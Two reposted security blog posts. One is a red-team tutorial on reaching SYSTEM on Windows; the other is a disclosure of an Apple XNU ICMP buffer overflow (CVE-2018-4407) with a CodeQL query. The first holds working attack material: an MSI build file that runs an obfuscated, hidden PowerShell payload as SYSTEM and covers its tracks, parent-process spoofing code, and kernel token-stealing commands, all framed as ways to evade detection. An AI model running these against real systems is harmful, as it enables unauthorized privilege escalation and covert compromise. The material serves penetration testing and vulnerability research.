Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little on how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as a FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native API’s to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • ReturnToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:

SeImpersonatePrivilege

This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research into the DOQU 2.0 malware I was doing, in which this APT actor was delivering malware packaged within a MSI file.

It turns out that a benefit of launching your code via an MSI are the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:

customaction

This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version=«1.0«?>
<Wix xmlns=«http://schemas.microsoft.com/wix/2006/wi«>
<Product Id=«*« UpgradeCode=«12345678-1234-1234-1234-111111111111« Name=«Example Product Name« Version=«0.0.1« Manufacturer=«@_xpn_« Language=«1033«>
<Package InstallerVersion=«200« Compressed=«yes« Comments=«Windows Installer Package«/>
<Media Id=«1« Cabinet=«product.cab« EmbedCab=«yes«/>
<Directory Id=«TARGETDIR« Name=«SourceDir«>
<Directory Id=«ProgramFilesFolder«>
<Directory Id=«INSTALLLOCATION« Name=«Example«>
<Component Id=«ApplicationFiles« Guid=«12345678-1234-1234-1234-222222222222«>
<File Id=«ApplicationFile1« Source=«example.exe«/>
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id=«DefaultFeature« Level=«1«>
<ComponentRef Id=«ApplicationFiles«/>
</Feature>
<Property Id=»cmdline»>powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABlAGgAQQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBEAEkAUwBVAEoAbABLAGwAVwAvAE8AZQBBAEkARQA0AEcAQQBoAEYAcAA0ADIAOQBOAGcAdQBMADEAMQAyAHYAZQBlAHYAMQB2ADkAOABZADcASgBTAHEAeQBWADIAdgAwAGwAbQBKADIAUABYAE8ANwBEADcAegB6AEQATQA3AGQAaQBQAGYAbABwAFQANwBTAHIAZwBZADMAVwArAFgAZQBLADEAOABmAGYAdgBtAHIASQA4AEYAWABpAGwAcQBaAHQAMABjAFAAeABRAHIAKwA0AEQAdwBmAGsANwBKAGkASABFAHoATQBNAGoAVgBwAGQAWABUAHoAcwA3AEEASwBpAE8AVwBmADcAYgB0AFYAYQBHAHMAZgBGAEwAVQBLAFEAcQBDAEcAbAA5AGgANgBzACsAdQByADYAdQBSAEUATQBTAFgAeAAzAG0AKwBTAFMAUQBLAFEANwBKADYAWQBwAFMARQBxAHEAYgA4AHAAWQB6AG0AUgBKAEQAegB1ADYAYwBGAHMAYQBYAHkAVgBjAG4AOABtAFcAOAB5AC8AbwBSAFoAWQByAGEAcgBZAG4AdABPAGwASABQAGsATwAvAEYAYQBoADkAcwA0AHgAcABnADMAQQAwAGEAbABtAHYAMwA4AE8AYQB0AE4AegA0AHUAegBmAFAAMQBMAGgARgBtAG8AWgBzADEAZABLAE0AawBxADcAegBDAFcAMQBaAFIAdgBXAG4AegBnAHcAeQA0AGcAYQByAFoATABiAGMARgBEADcAcwByADgAaQBQAG8AWABwAGYAegBRAEQANwBGAEwAZQByAEQAYgBtAG4AUwBKAG4ASABNAG4AegBHAG8AUQBDAGYAdwBKAEkAaQBQAGgASwA4ADgAeAB4AFoAcwBjAFQAZABRAHMARABQAHUAQwAyADgAaAB4AEIAQQBuAEIASQA5AC8AMgAxADMAeABKADEASQB3AGYATQBaAFoAVAAvAGwAQwBuAEMAWQBMADcAeQBKAGQAMABSAFcAQgBkAEUAcwBFAEQAawA0AGcAMQB0AFUAbQBZAGIAMgBIAGYAWQBlAFMAZQB1AEQATwAxAFIAegBaAHAANABMAC8AcQBwAEoANAA2AGcAVgBWAGYAQwBpADAASAAyAFgAawBGAGEAcABjADcARQBTAE4ASAA3ADYAegAyAE0AOQBqAFQAcgBHAHIAdwAvAEoAaABaAG8ATwBQAGIAMgB6AGQAdgAzADcAaQBwAE0ASwBMAHEAZQBuAGcAcQBDAGgAaQBkAFQAUQA5AGoAQQBuAGoAVgBQAGcALwBwAHcAZQA2AFQAVQBzAGcAcABYAFQAZwBWAFMAeQA1ADIATQBNADAAOABpAEkAaABvAE0AMgBVAGEANQAyAEkANgBtAHkAawBaAHUANwBnAHEANQBsADcAMwBMADYAYgBHAFkARQBxAHMAZQBjAEcAeAB1AGwAVgA0AFAAYgBVADQAZABXAGIAZwBsAG0AUQBxAHMANgA2AEkAWABxAGwAUwBpAFoAZABlAEYAMQAyAE4AdQBOAFEAbgB0AFoAMgBQAFYAOQBSAE8AZABhAFcAKwBSAEQAOQB4AEcAVABtAEUAbQBrAC8ATgBlAG8AQgBOAHoAUwBZAEwAeABLAGsAUgBSAGoAdwBzAFkAegBKAHoAeQB2AFIAbgB0AC8AcQBLAHkAbQBkAGYASQA2AEwATQBJAFEATABaAGsATQBJAFEAVQBFAEYAMgB0AFIALwBCAEgAUABPAGoAWgB0AHQAKwBsADYAeQBBAHEAdQBNADgAQwAyAGwAdwBRAGMAMABrAHQAVQA0AFUAdgBFAHQAUABqACsAZABnAGwASwAwAHkASABJAFkANQBwAFIAOQBCAE8AZABrADUAeABTAFMAWQBFAFMAZQBuAEkARAArAGsAeQBSAEsASwBKAEQAOABNAHMAOQAvAGgAZABpAE0AbQBxAFkAMQBEAG0AVwA0ADMAMAAwADYAbwBUAEkANgBzAGMAagArAFUASQByAEkAaABnAFIARAArAGcAeABrAFEAbQAyAEkAVwBzADUARgBUAFcAdABRAGgAeABzADYAawBYAG4AcAAwADkAawBVAHUAcQBwAGcAeAA2AG4AdQB3ADAAeABwAHkAQQBXADkAaQBEAGsAdwBaAHkAMABJAEEAeQBvAE0ARQB0AEwAeABKAFoASABzAFYATQBMAEkAQwBtADAATgBwAE4AeABqADIAbwBKAEMAVABVAGoAagBvAEMASAB2AEUAeQBiADQAQQBNAGwAWAA2AFUAZABZAHgASQB5AGsAVgBKAHgAQQBoAHoAUwBiAGoATQBxAGQAWQBWAEUAaQA0AEoARwBKADIAVQAwAG4AOQBIAG8AcQBUAEsAeQBMAEYAVQB4AFUAawB5AFkAdQBhAFYAcwAzAFUAMgBNAGwAWQA2ADUAbgA5ADMAcgBEADIAcwBVAEkAVABpAGcANgBFAEMAQQBsAGsATgBBAFIAZgBHAFQAZwBrAEgAOABxAG0ARgBFAEMAVgArAGsANgAvAG8AMQBVAEUAegA2AFQAdABzADYANQB0AEwARwBrAFIAYgBXAGkAeAAzAFkAWAAvAEkAYgAxAG8AOAAxAHIARgB1AGIAMQBaAHQASABSAFIAMgA4ADUAZAAxAEEANwBiADMAVgBhAC8ATgBtAGkAMQB5AHUAcwBiADAAeQBwAEwAcwA5ADYAVwB0AC8AMgAyADcATgBiAEgAaQA0AFcASgBXAHYAZgBEAGkAWAB4AHMAbwA5AFkARABMAFMAdwBuADUAWAAxAHcAUQAvAGQAbQBCAHoAbQBUAHIAZgA1AGgAYgArAHcAMwBCAFcATwA3AFgAMwBpAE8ATwA2AG0ANQByAGwAZAB4AHoAZgB2AGkAWgBZAE4AMgBSAHQAVwBCAFUAUwBqAGgAVABxADAAZQBkAFUAYgBHAHgAaQBpAFUAdwB6AHIAZAB0AEEAWgAwAE8ARgBqAGUATgBPAFQAVAB4AEcASgA0ADYATwByAGUAdQBIAGkARgA2AGIAWQBqAEYAbABhAFIAZAAvAGQAdABoAEoAcgB6AEMAMwB0AC8ANAAxAHIATgBlAGQAZgBaAFQAVgByADYAMQBhAGkAOABSAEgAVwBFAHEAbgA3AGQAYQBoAGoAOABkAG0ASQBJADEATgBjAHQANwBBAFgAYwAzAFUAQwBRAEkANgArAEsAagBJAFoATgB5AGUATgBnADIARABBAEcAZwA0AGEAQgBoAHMAMwBGAGwAOQBxAFYANwBvAEgAdgBHAE0AKwBOAGsAVgBXAGkAagA4AEgANABmAGcANwB6AEIAawBDADQAMQBRAHYAbAB0AGsAUAAyAGYARABJAEEALwB5AFoASAAyAEwAcwBIAEcANgA5AGEAcwB1AGMAdQAyAE4AVABlAEkAKwBOADkAagA0AGMAbAB2AEQAUQA0AE0AcwBDAG0AOABmAGcARgBjAEUAMgBDAFIAcAAvAEIAKwBzAE8AdwB4AEoASABGAGUAbQBPAE0ATwBvACsANwBoAHEANABYAEoALwAwAHkAYQBoAFgAbwBxAE8AbQBoAGUARQB2AHMARwBRAE8ATQB3AG4AVgB0AFgAOQBPAEwAbABzAE8AZAAwAFcAVgB2ADQAdQByAFcAbQBGAFgAMABXAHYAVQBoAHMARgAxAGQAMQB6AGUAdAAyAHEAMwA5AFcATgB4ACsAdgBLAHQAOAA3AEkAeQBvAHQAZQBKAG8AcQBPAHYAVwB1ADEAZwBiAEkASQA0AE0ARwBlAC8ARwBuAGMAdQBUAGoATAA5ADIAcgBYAGUAeABDAE8AZQBZAGcAUgBMAGcAcgBrADYAcgBzAGMARgBGAEkANwBsAHcAKwA1AHoARwBIAHEAcgA2ADMASgBHAFgAUgBQAGkARQBRAGYAdQBDAEIAcABjAEsARwBqAEgARwA3AGIAZwBMAEgASwA1AG4ANgBFAEQASAB2AGoAQwBEAG8AaAB6AEMAOABLAEwAMAA0AGsAaABUAG4AZwAyADEANwA1ADAAaABmAFgAVgA5AC8AUQBoAEkAbwBUAHcATwA0AHMAMQAzAGkATwAvAEoAZQBhADYAdwB2AFMAZwBVADQARwBvAHYAYgBNAHMARgBDAFAAYgBYAHcANgB2AHkAWQBLAGMAZQA5ADgAcgBGAHYAUwBHAGgANgBIAGwALwBkAHQAaABmAGkAOABzAG0ARQB4AG4ARwAvADAAOQBkAFUAcQA5AHoAKwBIAEgAKwBqAGIAcgB2ADcALwA1AGgAOQBaAGYAbwBMAE8AVABTAHcASAA5AGEAKwBQAEgARgBmAHkATAAzAHQAdwBnAFkAWQBTAHIAQgAyAG8AUgBiAGgANQBGAGoARgAzAHkAWgBoADAAUQB0AEoAeAA4AFAAawBDAEIAUQBnAHAAcwA4ADgAVABmAGMAWABTAFQAUABlAC8AQgBKADgAVABmAEIATwBiAEwANgBRAGcAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
</Property>
<CustomAction Id=«SystemShell« Execute=«deferred« Directory=«TARGETDIR« ExeCommand=[cmdline] Return=«ignore« Impersonate=«no«/>
<CustomAction Id=«FailInstall« Execute=«deferred« Script=«vbscript« Return=«check«>
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action=«SystemShell« After=«InstallInitialize«></Custom>
<Custom Action=«FailInstall« Before=«InstallFiles«></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
view rawmsigen.wix hosted with ❤ by GitHub

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommandattribute for long Powershell commands).

Another trick which is useful is to ensure that the install fails after our command is executed, which will stop the installer from adding a new entry to «Add or Remove Programs» which is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install
</CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

<InstallExecuteSequence>
  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into a MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:

shell3

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS method

This method of becoming SYSTEM was actually revealed to me via a post from James Forshaw’s walkthrough of how to become «Trusted Installer».

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:

PROC_THREAT_ATTRIBUTE_PARENT_PROCESS

So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

EnableDebugPriv();

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
	GetProcessHeap(),
	0,
	size
);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(
	"C:\\Windows\\system32\\cmd.exe", 
	NULL,
	NULL, 
	NULL, 
	true, 
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, 
	NULL,
	NULL, 
	reinterpret_cast<LPSTARTUPINFOA>(&si), 
	&pi
);

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;
}

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:

parentsystem2

The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESSstructure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208, which differs throughout each version (and potentially service pack) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within a EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
Privs:
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> dq <LSASS_PROCESS_ADDRESS>+0x208 L1
kd> ? <LSASS_TOKEN_ADDRESS> & FFFFFFFF`FFFFFFF0
kd> !process 0 0 cmd.exe
kd> eq <CMD_EPROCESS_ADDRESS+0x208> <LSASS_TOKEN_ADDRESS>

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

Реклама

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314mtod is used to get m‘s data pointer:

icp = mtod(m, struct icmp *);

mtod is just macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size of argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.410.13.510.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.

Timeline

  • 2018-08-09: Privately disclosed to product-security@apple.com. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by product-security@apple.com.
  • 2018-08-20: product-security@apple.com asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to product-security@apple.com. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: product-security@apple.com confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
